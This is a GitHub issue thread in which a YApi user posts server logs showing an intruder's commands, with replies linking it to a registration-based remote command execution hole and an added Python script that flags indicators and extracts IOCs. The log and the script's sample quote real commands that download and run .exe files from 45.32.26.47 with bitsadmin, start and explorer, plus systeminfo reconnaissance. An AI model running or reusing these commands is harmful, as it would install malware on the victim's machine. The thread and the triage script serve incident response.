
Errors appear on Windows, caused by a failing copy command; the log then shows it automatically opening Google Chrome to visit an IP and download an .exe. Is this YApi's own logic, or has the machine been infected? #2152

Open
yxAnswer opened this issue Mar 29, 2021 · 6 comments

@yxAnswer

[ 2021-3-26 11:24:22 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 11:24:23 ] [ log ] Service started, open the link below to access it:
http://127.0.0.1:9010/
[ 2021-3-26 11:25:31 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 11:25:32 ] [ log ] Service started, open the link below to access it:
http://127.0.0.1:9010/
[ 2021-3-26 11:27:55 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 11:27:55 ] [ log ] Service started, open the link below to access it:
http://127.0.0.1:9010/
[ 2021-3-26 11:27:55 ] [ log ] mongodb load success...
[ 2021-3-26 11:53:55 ] [ error ] Command failed: ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

[ 2021-3-26 12:10:04 ] [ error ] Command failed: cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab %APPDATA%�d4c.exe&%APPDATA%�d4c.exe&del %APPDATA%�d4c.exe
The filename, directory name, or volume label syntax is incorrect.
The filename, directory name, or volume label syntax is incorrect.

[ 2021-3-26 12:13:00 ] [ error ] Command failed: echo 'cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab %APPDATA%�d4c.exe&%APPDATA%�d4c.exe&del %APPDATA%�d4c.exe' >> 1.bat && dir
The filename, directory name, or volume label syntax is incorrect.
The filename, directory name, or volume label syntax is incorrect.

[ 2021-3-26 12:34:06 ] [ error ] Command failed: cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab %APPDATA%�d4c.exe&%APPDATA%�d4c.exe&del %APPDATA%�d4c.exe
The filename, directory name, or volume label syntax is incorrect.
The filename, directory name, or volume label syntax is incorrect.

[ 2021-3-26 12:34:28 ] [ error ] Command failed: cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab
[ 2021-3-26 12:35:01 ] [ error ] Command failed: cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab %APPDATA%�d4c.exe&%APPDATA%�d4c.exe
The filename, directory name, or volume label syntax is incorrect.

[ 2021-3-26 13:29:59 ] [ error ] Command failed: cd D:// && dir
The device is not ready.

[ 2021-3-26 13:38:25 ] [ error ] {}
[ 2021-3-26 13:39:04 ] [ error ] {}
[ 2021-3-26 13:39:38 ] [ error ] Command failed: echo systeminfo >> 1.txt && cat 1.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

[ 2021-3-26 13:40:24 ] [ error ] {}
[ 2021-3-26 13:43:24 ] [ error ] Command failed: explorer http://45.32.26.47:8044/aaa.exe
[ 2021-3-26 13:46:11 ] [ error ] Command failed: cd C:UsersAdministratorDownloads && dir
The system cannot find the path specified.

[ 2021-3-26 13:49:04 ] [ error ] Command failed: cd C://Users/Administrator/Downloads &&ren 522134.crdownload 1.exe &&dir
The system cannot find the file specified.

[ 2021-3-26 13:49:25 ] [ error ] Command failed: cd C://Users/Administrator/Downloads && ren 522134.crdownload 1.exe && dir
The system cannot find the file specified.

[ 2021-3-26 13:51:22 ] [ error ] Command failed: cd C://Users/Administrator/Downloads && copy 522134.crdownload 1.exe && dir
[ 2021-3-26 13:51:35 ] [ error ] Command failed: copy 522134.crdownload 1.exe && dir
[ 2021-3-26 13:52:06 ] [ error ] Command failed: cd C://Users/Administrator/Downloads && copy 522134.crdownload 1.exe && dir
[ 2021-3-26 13:53:45 ] [ error ] Command failed: copy C://Users/Administrator/Downloads/522134.crdownload C://Users/Administrator/Downloads/1.exe && dir
[ 2021-3-26 13:58:11 ] [ error ] Command failed: copy C://Users/Administrator/Downloads/522134.crdownload C://Users/Administrator/Downloads/1.exe && dir
[ 2021-3-26 14:36:42 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 14:36:43 ] [ log ] Service started, open the link below to access it:
http://127.0.0.1:9010/
[ 2021-3-26 14:36:44 ] [ log ] mongodb load success...
[ 2021-3-26 17:22:25 ] [ error ] Command failed: 1.exe
'1.exe' is not recognized as an internal or external command,
operable program or batch file.

[ 2021-3-26 17:22:54 ] [ error ] Command failed: 1.exe
'1.exe' is not recognized as an internal or external command,
operable program or batch file.

[ 2021-3-26 18:17:38 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 18:17:39 ] [ log ] Service started, open the link below to access it:
http://127.0.0.1:9010/
[ 2021-3-26 18:17:40 ] [ log ] mongodb load success...
[ 2021-3-26 18:29:36 ] [ error ] missing ) after argument list
[ 2021-3-26 18:30:20 ] [ error ] Command failed: start http://45.32.26.47:4878/test/a.exe && cd C:/Users/Administrator/Downloads && copy "未确认 905354.crdownload" 2.exe && dir
[ 2021-3-26 18:30:51 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && copy "未确认 905354.crdownload" 2.exe && dir
[ 2021-3-26 18:32:27 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 18:32:28 ] [ log ] Service started, open the link below to access it:
http://127.0.0.1:9010/
[ 2021-3-26 18:32:29 ] [ log ] mongodb load success...
[ 2021-3-26 18:33:12 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && copy a (2).exe 3.exe && dir
[ 2021-3-26 18:33:31 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && copy "a (2).exe" 3.exe && dir
[ 2021-3-26 18:35:02 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 18:35:03 ] [ log ] Service started, open the link below to access it:
http://127.0.0.1:9010/
[ 2021-3-26 18:35:03 ] [ log ] mongodb load success...
[ 2021-3-26 23:45:03 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && rm 97666def-2363-48ec-963c-7c950465770a.tmp&& dir
'rm' is not recognized as an internal or external command,
operable program or batch file.

[ 2021-3-26 23:45:04 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && rm 97666def-2363-48ec-963c-7c950465770a.tmp&& dir
'rm' is not recognized as an internal or external command,
operable program or batch file.

[ 2021-3-26 23:46:21 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && copy '未确认 172117.crdownload' 1.txt && dir
[ 2021-3-29 08:58:47 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-29 08:58:50 ] [ log ] Service started, open the link below to access it:
http://127.0.0.1:9010/
[ 2021-3-29 08:58:50 ] [ log ] mongodb load success...

@yxAnswer yxAnswer changed the title from "Errors appear on Windows, caused by a failing copy command; the log then shows it automatically visiting an IP and downloading an .exe. Is this YApi's own logic, or has the machine been infected?" to "Errors appear on Windows, caused by a failing copy command; the log then shows it automatically opening Google Chrome to visit an IP and download an .exe. Is this YApi's own logic, or has the machine been infected?" Mar 29, 2021
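Added example, not part of the issue thread and not YApi's own code: a small Python triage script that walks a log in the format posted above, pulls out every `Command failed:` event, tags each one with the indicators a responder would look for in this thread (a `bitsadmin /transfer` download, `start` or `explorer` launching a URL, references to `.exe` files, appending to a `.bat` file, handling a Chrome `.crdownload` file, `systeminfo` recon), and collects the download URLs and hosts as IOCs. The sample log embedded in the script is constructed in that format from commands quoted in the log above; the indicator names and patterns are this example's own choices, not anything YApi emits. An API mocking service has no business running `bitsadmin`, so every such event is worth a look even when the command itself is as harmless-looking as `ls`.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample in the format of the YApi log posted in this issue. The
# "Command failed" commands are quoted from that log; the first line is benign.
SAMPLE_LOG = """\
[ 2021-3-26 11:27:55 ] [ log ] mongodb load success...
[ 2021-3-26 11:53:55 ] [ error ] Command failed: ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

[ 2021-3-26 12:34:28 ] [ error ] Command failed: cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab
[ 2021-3-26 13:43:24 ] [ error ] Command failed: explorer http://45.32.26.47:8044/aaa.exe
[ 2021-3-26 18:30:20 ] [ error ] Command failed: start http://45.32.26.47:4878/test/a.exe && cd C:/Users/Administrator/Downloads && copy "未确认 905354.crdownload" 2.exe && dir
[ 2021-3-26 23:45:03 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && rm 97666def-2363-48ec-963c-7c950465770a.tmp&& dir
"""

# One YApi log line: "[ <timestamp> ] [ <level> ] <message>". Continuation lines
# (the shell's own error text) do not match and are skipped.
LINE_RE = re.compile(r"^\[ (?P<ts>[^\]]+) \] \[ (?P<level>\w+) \] (?P<msg>.*)$")
CMD_PREFIX = "Command failed: "
URL_RE = re.compile(r"https?://[^\s'\"&|]+")
HOST_RE = re.compile(r"https?://([^/:\s'\"&|]+)")

# Indicator names and patterns are this example's own choices (assumption),
# derived from the attacker behaviour visible in the thread's log.
INDICATORS = [
    ("bitsadmin download", re.compile(r"\bbitsadmin\b.*/transfer", re.I)),
    ("launches URL via start/explorer",
     re.compile(r"(?:^|&&|&|\|)\s*(?:start|explorer)\s+https?://", re.I)),
    ("remote URL", URL_RE),
    ("references .exe", re.compile(r"\.exe\b", re.I)),
    ("writes batch file", re.compile(r">>\s*\S+\.bat\b", re.I)),
    ("handles browser .crdownload file", re.compile(r"\.crdownload\b", re.I)),
    ("host recon (systeminfo)", re.compile(r"\bsysteminfo\b", re.I)),
]


@dataclass
class CommandEvent:
    timestamp: str
    command: str
    indicators: list[str] = field(default_factory=list)


def parse_events(log_text: str) -> list[CommandEvent]:
    """Return every command the server tried to execute, in log order."""
    events: list[CommandEvent] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m.group("msg").startswith(CMD_PREFIX):
            continue
        cmd = m.group("msg")[len(CMD_PREFIX):].strip()
        hits = [name for name, rx in INDICATORS if rx.search(cmd)]
        events.append(CommandEvent(m.group("ts"), cmd, hits))
    return events


def suspicious(events: list[CommandEvent]) -> list[CommandEvent]:
    """Events that matched at least one indicator."""
    return [ev for ev in events if ev.indicators]


def extract_iocs(events: list[CommandEvent]) -> dict[str, list[str]]:
    """Collect download URLs and the hosts they point at, deduplicated."""
    urls: set[str] = set()
    hosts: set[str] = set()
    for ev in events:
        urls.update(URL_RE.findall(ev.command))
        hosts.update(HOST_RE.findall(ev.command))
    return {"urls": sorted(urls), "hosts": sorted(hosts)}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print(f"{len(evs)} command executions, {len(suspicious(evs))} with indicators")
    for ev in suspicious(evs):
        print(f"{ev.timestamp}  {', '.join(ev.indicators)}\n    {ev.command}")
    print("IOCs:", extract_iocs(evs))
```

Run it against the real log file instead of `SAMPLE_LOG` by reading the file into `parse_events`; the host list is what you would feed to the firewall or proxy logs to see which other machines talked to the same address.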
@acccccccb

Judging from the download address 45.32.26.47:4878/test/a.exe, this doesn't look like legitimate code.

@yxAnswer (Author)

It has been normal recently; I don't know what happened during those two days.

@yxAnswer (Author)

[image]

The domains that have been bound to 45.32.26.47 are as follows:
2021-04-15 to 2021-04-15: www.winapi.top

@qiyulan (Contributor)

qiyulan commented Apr 16, 2021

If you have registration enabled, you will definitely get attacked.
See #2099, the remote command execution vulnerability.

@acccccccb

First check whether the server has been compromised; I'm not familiar with that, so I won't cover it. Here I'll focus on the changes to YApi:
1. Disable registration by adding "closeRegister": true to config.json.
2. Check and clean up the users in YApi.
3. I've written up the code changes under issue #2099; discussion is welcome.

@yxAnswer (Author)

After disabling registration, how do I add users? I saw an earlier issue about this, but I didn't see how to enable adding users.
